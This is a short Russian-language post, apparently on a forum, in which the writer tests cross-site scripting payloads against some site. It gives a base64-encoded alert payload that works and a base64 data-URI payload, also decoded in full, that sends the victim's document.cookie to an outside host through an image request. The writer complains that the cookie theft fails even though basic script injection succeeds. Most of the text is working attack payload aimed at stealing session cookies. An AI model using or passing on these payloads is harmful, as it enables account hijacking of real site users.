вот например такое проходит PHNjcmlwdD4NCmFsZXJ0KFhTUykNCjwvc2NyaXB0Pg== что равно <script>alert(XSS)</script>. а data:text/html;base64,PHNjcmlwdD4NCmltZyA9IG5ldyBJbWFnZSgpOy BpbWcuc3JjID0gImh0dHA6Ly9odHRwei5ydS9u
cGhpcjhseG0xeS5naWY/Iitkb2N1bWVudC5jb29raWU7DQo8L3NjcmlwdD4= что значит <script>
img = new Image(); img.src = "http://httpz.ru/nphir8lxm1y.gif?"+document.cookie;
</script>
не проходит( ведь если проходит "><script>alert()</script> значит уязвимость есть, следовательно и куки должны вороваться